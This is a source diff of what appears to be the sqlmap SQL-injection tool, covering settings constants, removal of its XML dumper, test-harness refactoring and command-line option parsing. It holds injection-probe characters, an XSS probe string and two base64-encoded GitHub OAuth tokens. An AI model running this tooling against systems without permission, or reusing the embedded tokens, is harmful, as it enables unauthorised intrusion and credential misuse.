MAX_TIME_REVALIDATION_STEPS = 5 MAX_REVALIDATION_STEPS = 5
# Characters that can be used to split parameter values in provided command line (e.g. in --tamper) # Characters that can be used to split parameter values in provided command line (e.g. in --tamper)
PARAMETER_SPLITTING_REGEX = r'[,|;]' PARAMETER_SPLITTING_REGEX = r"[,|;]"
# Regular expression describing possible union char value (e.g. used in --union-char) # Regular expression describing possible union char value (e.g. used in --union-char)
UNION_CHAR_REGEX = r'\A\w+\Z' UNION_CHAR_REGEX = r"\A\w+\Z"
# Attribute used for storing original parameter value in special cases (e.g. POST) # Attribute used for storing original parameter value in special cases (e.g. POST)
UNENCODED_ORIGINAL_VALUE = 'original' UNENCODED_ORIGINAL_VALUE = "original"
# Common column names containing usernames (used for hash cracking in some cases) # Common column names containing usernames (used for hash cracking in some cases)
COMMON_USER_COLUMNS = ('user', 'username', 'user_name', 'benutzername', 'benutzer', 'utilisateur', 'usager', 'consommateur', 'utente', 'utilizzatore', 'usufrutuario', 'korisnik', 'usuario', 'consumidor') COMMON_USER_COLUMNS = ("user", "username", "user_name", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "usufrutuario", "korisnik", "usuario", "consumidor")
# Default delimiter in GET/POST values # Default delimiter in GET/POST values
DEFAULT_GET_POST_DELIMITER = '&' DEFAULT_GET_POST_DELIMITER = '&'
@@ -532,7 +542,7 @@ DEFAULT_COOKIE_DELIMITER = ';'
FORCE_COOKIE_EXPIRATION_TIME = "9999999999" FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
# Github OAuth token used for creating an automatic Issue for unhandled exceptions # Github OAuth token used for creating an automatic Issue for unhandled exceptions
GITHUB_REPORT_OAUTH_TOKEN = "YzNkYTgyMTdjYzdjNjZjMjFjMWE5ODI5OGQyNzk2ODM1M2M0MzUyOA==" GITHUB_REPORT_OAUTH_TOKEN = "NTMyNWNkMmZkMzRlMDZmY2JkMmY0MGI4NWI0MzVlM2Q5YmFjYWNhYQ=="
# Skip unforced HashDB flush requests below the threshold number of cached items # Skip unforced HashDB flush requests below the threshold number of cached items
HASHDB_FLUSH_THRESHOLD = 32 HASHDB_FLUSH_THRESHOLD = 32
@@ -544,7 +554,7 @@ HASHDB_FLUSH_RETRIES = 3
HASHDB_END_TRANSACTION_RETRIES = 3 HASHDB_END_TRANSACTION_RETRIES = 3
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism) # Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
HASHDB_MILESTONE_VALUE = "baFJusZrel" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))' HASHDB_MILESTONE_VALUE = "BkfRWrtCYK" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))'
# Warn user of possible delay due to large page dump in full UNION query injections # Warn user of possible delay due to large page dump in full UNION query injections
LARGE_OUTPUT_THRESHOLD = 1024 ** 2 LARGE_OUTPUT_THRESHOLD = 1024 ** 2
@@ -570,6 +580,9 @@ DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
# Alphabet used for heuristic checks # Alphabet used for heuristic checks
HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.') HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.')
# Minor artistic touch
BANNER = re.sub(r"\[.\]", lambda _: "[\033[01;41m%s\033[01;49m]" % random.sample(HEURISTIC_CHECK_ALPHABET, 1)[0], BANNER)
# String used for dummy non-SQLi (e.g. XSS) heuristic checks of a tested parameter value # String used for dummy non-SQLi (e.g. XSS) heuristic checks of a tested parameter value
DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">" DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">"
@@ -583,7 +596,7 @@ NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024 MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
# Maximum response total page size (trimmed if larger) # Maximum response total page size (trimmed if larger)
MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024 MAX_CONNECTION_TOTAL_SIZE = 50 * 1024 * 1024
# For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher) # For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher)
MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024 MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024
@@ -604,7 +617,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
CHECK_ZERO_COLUMNS_THRESHOLD = 10 CHECK_ZERO_COLUMNS_THRESHOLD = 10
# Boldify all logger messages containing these "patterns" # Boldify all logger messages containing these "patterns"
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA") BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA")
# Generic www root directory names # Generic www root directory names
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www") GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")

View File

@@ -68,7 +68,6 @@ from lib.core.settings import URI_INJECTABLE_REGEX
from lib.core.settings import USER_AGENT_ALIASES from lib.core.settings import USER_AGENT_ALIASES
from lib.core.settings import XML_RECOGNITION_REGEX from lib.core.settings import XML_RECOGNITION_REGEX
from lib.utils.hashdb import HashDB from lib.utils.hashdb import HashDB
from lib.core.xmldump import dumper as xmldumper
from thirdparty.odict.odict import OrderedDict from thirdparty.odict.odict import OrderedDict
def _setRequestParams(): def _setRequestParams():
@@ -593,11 +592,7 @@ def _createDumpDir():
conf.dumpPath = tempDir conf.dumpPath = tempDir
def _configureDumper(): def _configureDumper():
if hasattr(conf, 'xmlFile') and conf.xmlFile:
conf.dumper = xmldumper
else:
conf.dumper = dumper conf.dumper = dumper
conf.dumper.setOutputFile() conf.dumper.setOutputFile()
def _createTargetDirs(): def _createTargetDirs():

View File

@@ -41,6 +41,8 @@ class Failures(object):
failedParseOn = None failedParseOn = None
failedTraceBack = None failedTraceBack = None
_failures = Failures()
def smokeTest(): def smokeTest():
""" """
Runs the basic smoke testing of a program Runs the basic smoke testing of a program
@@ -53,16 +55,17 @@ def smokeTest():
if any(_ in root for _ in ("thirdparty", "extra")): if any(_ in root for _ in ("thirdparty", "extra")):
continue continue
for ifile in files: for filename in files:
if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py":
length += 1 length += 1
for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH):
if any(_ in root for _ in ("thirdparty", "extra")): if any(_ in root for _ in ("thirdparty", "extra")):
continue continue
for ifile in files: for filename in files:
if os.path.splitext(ifile)[1].lower() == ".py" and ifile != "__init__.py": if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py":
path = os.path.join(root, os.path.splitext(ifile)[0]) path = os.path.join(root, os.path.splitext(filename)[0])
path = path.replace(paths.SQLMAP_ROOT_PATH, '.') path = path.replace(paths.SQLMAP_ROOT_PATH, '.')
path = path.replace(os.sep, '.').lstrip('.') path = path.replace(os.sep, '.').lstrip('.')
try: try:
@@ -71,7 +74,7 @@ def smokeTest():
except Exception, msg: except Exception, msg:
retVal = False retVal = False
dataToStdout("\r") dataToStdout("\r")
errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, ifile), msg) errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), msg)
logger.error(errMsg) logger.error(errMsg)
else: else:
# Run doc tests # Run doc tests
@@ -192,11 +195,11 @@ def liveTest():
else: else:
errMsg = "test failed" errMsg = "test failed"
if Failures.failedItems: if _failures.failedItems:
errMsg += " at parsing items: %s" % ", ".join(i for i in Failures.failedItems) errMsg += " at parsing items: %s" % ", ".join(i for i in _failures.failedItems)
errMsg += " - scan folder: %s" % paths.SQLMAP_OUTPUT_PATH errMsg += " - scan folder: %s" % paths.SQLMAP_OUTPUT_PATH
errMsg += " - traceback: %s" % bool(Failures.failedTraceBack) errMsg += " - traceback: %s" % bool(_failures.failedTraceBack)
if not vulnerable: if not vulnerable:
errMsg += " - SQL injection not detected" errMsg += " - SQL injection not detected"
@@ -204,14 +207,14 @@ def liveTest():
logger.error(errMsg) logger.error(errMsg)
test_case_fd.write("%s\n" % errMsg) test_case_fd.write("%s\n" % errMsg)
if Failures.failedParseOn: if _failures.failedParseOn:
console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING) console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING)
console_output_fd.write(Failures.failedParseOn) console_output_fd.write(_failures.failedParseOn)
console_output_fd.close() console_output_fd.close()
if Failures.failedTraceBack: if _failures.failedTraceBack:
traceback_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "traceback"), "wb", UNICODE_ENCODING) traceback_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "traceback"), "wb", UNICODE_ENCODING)
traceback_fd.write(Failures.failedTraceBack) traceback_fd.write(_failures.failedTraceBack)
traceback_fd.close() traceback_fd.close()
beep() beep()
@@ -232,9 +235,9 @@ def liveTest():
return retVal return retVal
def initCase(switches, count): def initCase(switches, count):
Failures.failedItems = [] _failures.failedItems = []
Failures.failedParseOn = None _failures.failedParseOn = None
Failures.failedTraceBack = None _failures.failedTraceBack = None
paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp(prefix="%s%d-" % (MKSTEMP_PREFIX.TESTING, count)) paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp(prefix="%s%d-" % (MKSTEMP_PREFIX.TESTING, count))
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump") paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
@@ -278,10 +281,10 @@ def runCase(parse):
LOGGER_HANDLER.stream = sys.stdout = sys.__stdout__ LOGGER_HANDLER.stream = sys.stdout = sys.__stdout__
if unhandled_exception: if unhandled_exception:
Failures.failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc()) _failures.failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc())
retVal = None retVal = None
elif handled_exception: elif handled_exception:
Failures.failedTraceBack = "handled exception: %s" % str(traceback.format_exc()) _failures.failedTraceBack = "handled exception: %s" % str(traceback.format_exc())
retVal = None retVal = None
elif result is False: # this means no SQL injection has been detected - if None, ignore elif result is False: # this means no SQL injection has been detected - if None, ignore
retVal = False retVal = False
@@ -298,17 +301,17 @@ def runCase(parse):
if item.startswith("r'") and item.endswith("'"): if item.startswith("r'") and item.endswith("'"):
if not re.search(item[2:-1], parse_on, re.DOTALL): if not re.search(item[2:-1], parse_on, re.DOTALL):
retVal = None retVal = None
Failures.failedItems.append(item) _failures.failedItems.append(item)
elif item not in parse_on: elif item not in parse_on:
retVal = None retVal = None
Failures.failedItems.append(item) _failures.failedItems.append(item)
if Failures.failedItems: if _failures.failedItems:
Failures.failedParseOn = console _failures.failedParseOn = console
elif retVal is False: elif retVal is False:
Failures.failedParseOn = console _failures.failedParseOn = console
return retVal return retVal

View File

@@ -42,6 +42,7 @@ class _ThreadData(threading.local):
self.disableStdOut = False self.disableStdOut = False
self.hashDBCursor = None self.hashDBCursor = None
self.inTransaction = False self.inTransaction = False
self.lastCode = None
self.lastComparisonPage = None self.lastComparisonPage = None
self.lastComparisonHeaders = None self.lastComparisonHeaders = None
self.lastComparisonCode = None self.lastComparisonCode = None
@@ -58,6 +59,7 @@ class _ThreadData(threading.local):
self.retriesCount = 0 self.retriesCount = 0
self.seqMatcher = difflib.SequenceMatcher(None) self.seqMatcher = difflib.SequenceMatcher(None)
self.shared = shared self.shared = shared
self.validationRun = 0
self.valueStack = [] self.valueStack = []
ThreadData = _ThreadData() ThreadData = _ThreadData()

View File

@@ -1,536 +0,0 @@
#!/usr/bin/env python
import codecs
import os
import re
import xml
import xml.sax.saxutils as saxutils
from lib.core.common import getUnicode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import SqlmapFilePathException
from lib.core.settings import UNICODE_ENCODING
from thirdparty.prettyprint import prettyprint
from xml.dom.minidom import Document
from xml.parsers.expat import ExpatError
TECHNIC_ELEM_NAME = "Technic"
TECHNICS_ELEM_NAME = "Technics"
BANNER_ELEM_NAME = "Banner"
COLUMNS_ELEM_NAME = "DatabaseColumns"
COLUMN_ELEM_NAME = "Column"
CELL_ELEM_NAME = "Cell"
COLUMN_ATTR = "column"
ROW_ELEM_NAME = "Row"
TABLES_ELEM_NAME = "tables"
DATABASE_COLUMNS_ELEM = "DB"
DB_TABLES_ELEM_NAME = "DBTables"
DB_TABLE_ELEM_NAME = "DBTable"
IS_DBA_ELEM_NAME = "isDBA"
FILE_CONTENT_ELEM_NAME = "FileContent"
DB_ATTR = "db"
UNKNOWN_COLUMN_TYPE = "unknown"
USER_SETTINGS_ELEM_NAME = "UserSettings"
USER_SETTING_ELEM_NAME = "UserSetting"
USERS_ELEM_NAME = "Users"
USER_ELEM_NAME = "User"
DB_USER_ELEM_NAME = "DBUser"
SETTINGS_ELEM_NAME = "Settings"
DBS_ELEM_NAME = "DBs"
DB_NAME_ELEM_NAME = "DBName"
DATABASE_ELEM_NAME = "Database"
TABLE_ELEM_NAME = "Table"
DB_TABLE_VALUES_ELEM_NAME = "DBTableValues"
DB_VALUES_ELEM = "DBValues"
QUERIES_ELEM_NAME = "Queries"
QUERY_ELEM_NAME = "Query"
REGISTERY_ENTRIES_ELEM_NAME = "RegistryEntries"
REGISTER_DATA_ELEM_NAME = "RegisterData"
DEFAULT_DB = "All"
MESSAGE_ELEM = "Message"
MESSAGES_ELEM_NAME = "Messages"
ERROR_ELEM_NAME = "Error"
LST_ELEM_NAME = "List"
LSTS_ELEM_NAME = "Lists"
CURRENT_USER_ELEM_NAME = "CurrentUser"
CURRENT_DB_ELEM_NAME = "CurrentDB"
MEMBER_ELEM = "Member"
ADMIN_USER = "Admin"
REGULAR_USER = "User"
STATUS_ELEM_NAME = "Status"
RESULTS_ELEM_NAME = "Results"
UNHANDLED_PROBLEM_TYPE = "Unhandled"
NAME_ATTR = "name"
TYPE_ATTR = "type"
VALUE_ATTR = "value"
SUCESS_ATTR = "success"
NAME_SPACE_ATTR = 'http://www.w3.org/2001/XMLSchema-instance'
XMLNS_ATTR = "xmlns:xsi"
SCHEME_NAME = "sqlmap.xsd"
SCHEME_NAME_ATTR = "xsi:noNamespaceSchemaLocation"
CHARACTERS_TO_ENCODE = range(32) + range(127, 256)
ENTITIES = {'"': '&quot;', "'": "&apos;"}
class XMLDump(object):
'''
This class purpose is to dump the data into an xml Format.
The format of the xml file is described in the scheme file xml/sqlmap.xsd
'''
def __init__(self):
self._outputFile = None
self._outputFP = None
self.__root = None
self.__doc = Document()
def _addToRoot(self, element):
'''
Adds element to the root element
'''
self.__root.appendChild(element)
def __write(self, data, n=True):
'''
Writes the data into the file
'''
if n:
self._outputFP.write("%s\n" % data)
else:
self._outputFP.write("%s " % data)
self._outputFP.flush()
kb.dataOutputFlag = True
def _getRootChild(self, elemName):
'''
Returns the child of the root with the described name
'''
elements = self.__root.getElementsByTagName(elemName)
if elements:
return elements[0]
return elements
def _createTextNode(self, data):
'''
Creates a text node with utf8 data inside.
The text is escaped to an fit the xml text Format.
'''
if data is None:
return self.__doc.createTextNode(u'')
else:
escaped_data = saxutils.escape(data, ENTITIES)
return self.__doc.createTextNode(escaped_data)
def _createAttribute(self, attrName, attrValue):
'''
Creates an attribute node with utf8 data inside.
The text is escaped to an fit the xml text Format.
'''
attr = self.__doc.createAttribute(attrName)
if attrValue is None:
attr.nodeValue = u''
else:
attr.nodeValue = getUnicode(attrValue)
return attr
def string(self, header, data, sort=True):
'''
Adds string element to the xml.
'''
if isinstance(data, (list, tuple, set)):
self.lister(header, data, sort)
return
messagesElem = self._getRootChild(MESSAGES_ELEM_NAME)
if (not(messagesElem)):
messagesElem = self.__doc.createElement(MESSAGES_ELEM_NAME)
self._addToRoot(messagesElem)
if data:
data = self._formatString(data)
else:
data = ""
elem = self.__doc.createElement(MESSAGE_ELEM)
elem.setAttributeNode(self._createAttribute(TYPE_ATTR, header))
elem.appendChild(self._createTextNode(data))
messagesElem.appendChild(elem)
def lister(self, header, elements, sort=True):
'''
Adds information formatted as list element
'''
lstElem = self.__doc.createElement(LST_ELEM_NAME)
lstElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header))
if elements:
if sort:
try:
elements = set(elements)
elements = list(elements)
elements.sort(key=lambda x: x.lower())
except:
pass
for element in elements:
memberElem = self.__doc.createElement(MEMBER_ELEM)
lstElem.appendChild(memberElem)
if isinstance(element, basestring):
memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "string"))
memberElem.appendChild(self._createTextNode(element))
elif isinstance(element, (list, tuple, set)):
memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "list"))
for e in element:
memberElemStr = self.__doc.createElement(MEMBER_ELEM)
memberElemStr.setAttributeNode(self._createAttribute(TYPE_ATTR, "string"))
memberElemStr.appendChild(self._createTextNode(getUnicode(e)))
memberElem.appendChild(memberElemStr)
listsElem = self._getRootChild(LSTS_ELEM_NAME)
if not(listsElem):
listsElem = self.__doc.createElement(LSTS_ELEM_NAME)
self._addToRoot(listsElem)
listsElem.appendChild(lstElem)
def technic(self, technicType, data):
'''
Adds information about the technic used to extract data from the db
'''
technicElem = self.__doc.createElement(TECHNIC_ELEM_NAME)
technicElem.setAttributeNode(self._createAttribute(TYPE_ATTR, technicType))
textNode = self._createTextNode(data)
technicElem.appendChild(textNode)
technicsElem = self._getRootChild(TECHNICS_ELEM_NAME)
if not(technicsElem):
technicsElem = self.__doc.createElement(TECHNICS_ELEM_NAME)
self._addToRoot(technicsElem)
technicsElem.appendChild(technicElem)
def banner(self, data):
'''
Adds information about the database banner to the xml.
The banner contains information about the type and the version of the database.
'''
bannerElem = self.__doc.createElement(BANNER_ELEM_NAME)
bannerElem.appendChild(self._createTextNode(data))
self._addToRoot(bannerElem)
def currentUser(self, data):
'''
Adds information about the current database user to the xml
'''
currentUserElem = self.__doc.createElement(CURRENT_USER_ELEM_NAME)
textNode = self._createTextNode(data)
currentUserElem.appendChild(textNode)
self._addToRoot(currentUserElem)
def currentDb(self, data):
'''
Adds information about the current database is use to the xml
'''
currentDBElem = self.__doc.createElement(CURRENT_DB_ELEM_NAME)
textNode = self._createTextNode(data)
currentDBElem.appendChild(textNode)
self._addToRoot(currentDBElem)
def dba(self, isDBA):
'''
Adds information to the xml that indicates whether the user has DBA privileges
'''
isDBAElem = self.__doc.createElement(IS_DBA_ELEM_NAME)
isDBAElem.setAttributeNode(self._createAttribute(VALUE_ATTR, getUnicode(isDBA)))
self._addToRoot(isDBAElem)
def users(self, users):
'''
Adds a list of the existing users to the xml
'''
usersElem = self.__doc.createElement(USERS_ELEM_NAME)
if isinstance(users, basestring):
users = [users]
if users:
for user in users:
userElem = self.__doc.createElement(DB_USER_ELEM_NAME)
usersElem.appendChild(userElem)
userElem.appendChild(self._createTextNode(user))
self._addToRoot(usersElem)
def dbs(self, dbs):
'''
Adds a list of the existing databases to the xml
'''
dbsElem = self.__doc.createElement(DBS_ELEM_NAME)
if dbs:
for db in dbs:
dbElem = self.__doc.createElement(DB_NAME_ELEM_NAME)
dbsElem.appendChild(dbElem)
dbElem.appendChild(self._createTextNode(db))
self._addToRoot(dbsElem)
def userSettings(self, header, userSettings, subHeader):
'''
Adds information about the user's settings to the xml.
The information can be user's passwords, privileges and etc..
'''
self._areAdmins = set()
userSettingsElem = self._getRootChild(USER_SETTINGS_ELEM_NAME)
if (not(userSettingsElem)):
userSettingsElem = self.__doc.createElement(USER_SETTINGS_ELEM_NAME)
self._addToRoot(userSettingsElem)
userSettingElem = self.__doc.createElement(USER_SETTING_ELEM_NAME)
userSettingElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header))
if isinstance(userSettings, (tuple, list, set)):
self._areAdmins = userSettings[1]
userSettings = userSettings[0]
users = userSettings.keys()
users.sort(key=lambda x: x.lower())
for user in users:
userElem = self.__doc.createElement(USER_ELEM_NAME)
userSettingElem.appendChild(userElem)
if user in self._areAdmins:
userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, ADMIN_USER))
else:
userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, REGULAR_USER))
settings = userSettings[user]
settings.sort()
for setting in settings:
settingsElem = self.__doc.createElement(SETTINGS_ELEM_NAME)
settingsElem.setAttributeNode(self._createAttribute(TYPE_ATTR, subHeader))
settingTextNode = self._createTextNode(setting)
settingsElem.appendChild(settingTextNode)
userElem.appendChild(settingsElem)
userSettingsElem.appendChild(userSettingElem)
def dbTables(self, dbTables):
'''
Adds information of the existing db tables to the xml
'''
if not isinstance(dbTables, dict):
self.string(TABLES_ELEM_NAME, dbTables)
return
dbTablesElem = self.__doc.createElement(DB_TABLES_ELEM_NAME)
for db, tables in dbTables.items():
tables.sort(key=lambda x: x.lower())
dbElem = self.__doc.createElement(DATABASE_ELEM_NAME)
dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db))
dbTablesElem.appendChild(dbElem)
for table in tables:
tableElem = self.__doc.createElement(DB_TABLE_ELEM_NAME)
tableElem.appendChild(self._createTextNode(table))
dbElem.appendChild(tableElem)
self._addToRoot(dbTablesElem)
def dbTableColumns(self, tableColumns):
'''
Adds information about the columns of the existing tables to the xml
'''
columnsElem = self._getRootChild(COLUMNS_ELEM_NAME)
if not(columnsElem):
columnsElem = self.__doc.createElement(COLUMNS_ELEM_NAME)
for db, tables in tableColumns.items():
if not db:
db = DEFAULT_DB
dbElem = self.__doc.createElement(DATABASE_COLUMNS_ELEM)
dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db))
columnsElem.appendChild(dbElem)
for table, columns in tables.items():
tableElem = self.__doc.createElement(TABLE_ELEM_NAME)
tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table))
colList = columns.keys()
colList.sort(key=lambda x: x.lower())
for column in colList:
colType = columns[column]
colElem = self.__doc.createElement(COLUMN_ELEM_NAME)
if colType is not None:
colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, colType))
else:
colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNKNOWN_COLUMN_TYPE))
colElem.appendChild(self._createTextNode(column))
tableElem.appendChild(colElem)
self._addToRoot(columnsElem)
def dbTableValues(self, tableValues):
'''
Adds the values of specific table to the xml.
The values are organized according to the relevant row and column.
'''
tableElem = self.__doc.createElement(DB_TABLE_VALUES_ELEM_NAME)
if (tableValues is not None):
db = tableValues["__infos__"]["db"]
if not db:
db = "All"
table = tableValues["__infos__"]["table"]
count = int(tableValues["__infos__"]["count"])
columns = tableValues.keys()
columns.sort(key=lambda x: x.lower())
tableElem.setAttributeNode(self._createAttribute(DB_ATTR, db))
tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table))
for i in range(count):
rowElem = self.__doc.createElement(ROW_ELEM_NAME)
tableElem.appendChild(rowElem)
for column in columns:
if column != "__infos__":
info = tableValues[column]
value = info["values"][i]
if re.search("^[\ *]*$", value):
value = "NULL"
cellElem = self.__doc.createElement(CELL_ELEM_NAME)
cellElem.setAttributeNode(self._createAttribute(COLUMN_ATTR, column))
cellElem.appendChild(self._createTextNode(value))
rowElem.appendChild(cellElem)
dbValuesElem = self._getRootChild(DB_VALUES_ELEM)
if (not(dbValuesElem)):
dbValuesElem = self.__doc.createElement(DB_VALUES_ELEM)
self._addToRoot(dbValuesElem)
dbValuesElem.appendChild(tableElem)
logger.info("Table '%s.%s' dumped to XML file" % (db, table))
def dbColumns(self, dbColumns, colConsider, dbs):
'''
Adds information about the columns
'''
for column in dbColumns.keys():
printDbs = {}
for db, tblData in dbs.items():
for tbl, colData in tblData.items():
for col, dataType in colData.items():
if column in col:
if db in printDbs:
if tbl in printDbs[db]:
printDbs[db][tbl][col] = dataType
else:
printDbs[db][tbl] = {col: dataType}
else:
printDbs[db] = {}
printDbs[db][tbl] = {col: dataType}
continue
self.dbTableColumns(printDbs)
def query(self, query, queryRes):
'''
Adds details of an executed query to the xml.
The query details are the query itself and its results.
'''
queryElem = self.__doc.createElement(QUERY_ELEM_NAME)
queryElem.setAttributeNode(self._createAttribute(VALUE_ATTR, query))
queryElem.appendChild(self._createTextNode(queryRes))
queriesElem = self._getRootChild(QUERIES_ELEM_NAME)
if (not(queriesElem)):
queriesElem = self.__doc.createElement(QUERIES_ELEM_NAME)
self._addToRoot(queriesElem)
queriesElem.appendChild(queryElem)
def registerValue(self, registerData):
'''
Adds information about an extracted registry key to the xml
'''
registerElem = self.__doc.createElement(REGISTER_DATA_ELEM_NAME)
registerElem.appendChild(self._createTextNode(registerData))
registriesElem = self._getRootChild(REGISTERY_ENTRIES_ELEM_NAME)
if (not(registriesElem)):
registriesElem = self.__doc.createElement(REGISTERY_ENTRIES_ELEM_NAME)
self._addToRoot(registriesElem)
registriesElem.appendChild(registerElem)
def rFile(self, filePath, data):
'''
Adds an extracted file's content to the xml
'''
fileContentElem = self.__doc.createElement(FILE_CONTENT_ELEM_NAME)
fileContentElem.setAttributeNode(self._createAttribute(NAME_ATTR, filePath))
fileContentElem.appendChild(self._createTextNode(data))
self._addToRoot(fileContentElem)
def setOutputFile(self):
'''
Initiates the xml file from the configuration.
'''
if (conf.xmlFile):
try:
self._outputFile = conf.xmlFile
self.__root = None
if os.path.exists(self._outputFile):
try:
self.__doc = xml.dom.minidom.parse(self._outputFile)
self.__root = self.__doc.childNodes[0]
except ExpatError:
self.__doc = Document()
self._outputFP = codecs.open(self._outputFile, "w+", UNICODE_ENCODING)
if self.__root is None:
self.__root = self.__doc.createElementNS(NAME_SPACE_ATTR, RESULTS_ELEM_NAME)
self.__root.setAttributeNode(self._createAttribute(XMLNS_ATTR, NAME_SPACE_ATTR))
self.__root.setAttributeNode(self._createAttribute(SCHEME_NAME_ATTR, SCHEME_NAME))
self.__doc.appendChild(self.__root)
except IOError:
raise SqlmapFilePathException("Wrong filename provided for saving the xml file: %s" % conf.xmlFile)
def getOutputFile(self):
return self._outputFile
def finish(self, resultStatus, resultMsg=""):
'''
Finishes the dumper operation:
1. Adds the session status to the xml
2. Writes the xml to the file
3. Closes the xml file
'''
if ((self._outputFP is not None) and not(self._outputFP.closed)):
statusElem = self.__doc.createElement(STATUS_ELEM_NAME)
statusElem.setAttributeNode(self._createAttribute(SUCESS_ATTR, getUnicode(resultStatus)))
if not resultStatus:
errorElem = self.__doc.createElement(ERROR_ELEM_NAME)
if isinstance(resultMsg, Exception):
errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, type(resultMsg).__name__))
else:
errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNHANDLED_PROBLEM_TYPE))
errorElem.appendChild(self._createTextNode(getUnicode(resultMsg)))
statusElem.appendChild(errorElem)
self._addToRoot(statusElem)
self.__write(prettyprint.formatXML(self.__doc, encoding=UNICODE_ENCODING))
self._outputFP.close()
def closeDumper(status, msg=""):
"""
Closes the dumper of the session
"""
if hasattr(conf, "dumper") and hasattr(conf.dumper, "finish"):
conf.dumper.finish(status, msg)
dumper = XMLDump()

View File

@@ -759,6 +759,9 @@ def cmdLineParser(argv=None):
parser.add_option("--dummy", dest="dummy", action="store_true", parser.add_option("--dummy", dest="dummy", action="store_true",
help=SUPPRESS_HELP) help=SUPPRESS_HELP)
parser.add_option("--murphy-rate", dest="murphyRate", type="int",
help=SUPPRESS_HELP)
parser.add_option("--pickled-options", dest="pickledOptions", parser.add_option("--pickled-options", dest="pickledOptions",
help=SUPPRESS_HELP) help=SUPPRESS_HELP)
@@ -882,7 +885,6 @@ def cmdLineParser(argv=None):
except ValueError, ex: except ValueError, ex:
raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message
# Hide non-basic options in basic help case
for i in xrange(len(argv)): for i in xrange(len(argv)):
if argv[i] == "-hh": if argv[i] == "-hh":
argv[i] = "-h" argv[i] = "-h"
@@ -910,6 +912,14 @@ def cmdLineParser(argv=None):
if not found: if not found:
parser.option_groups.remove(group) parser.option_groups.remove(group)
for verbosity in (_ for _ in argv if re.search(r"\A\-v+\Z", _)):
try:
if argv.index(verbosity) == len(argv) - 1 or not argv[argv.index(verbosity) + 1].isdigit():
conf.verbose = verbosity.count('v') + 1
del argv[argv.index(verbosity)]
except (IndexError, ValueError):
pass
try: try:
(args, _) = parser.parse_args(argv) (args, _) = parser.parse_args(argv)
except UnicodeEncodeError, ex: except UnicodeEncodeError, ex:

View File

@@ -59,6 +59,13 @@ def htmlParser(page):
xmlfile = paths.ERRORS_XML xmlfile = paths.ERRORS_XML
handler = HTMLHandler(page) handler = HTMLHandler(page)
key = hash(page)
if key in kb.cache.parsedDbms:
retVal = kb.cache.parsedDbms[key]
if retVal:
handler._markAsErrorPage()
return retVal
parseXmlFile(xmlfile, handler) parseXmlFile(xmlfile, handler)
@@ -68,6 +75,8 @@ def htmlParser(page):
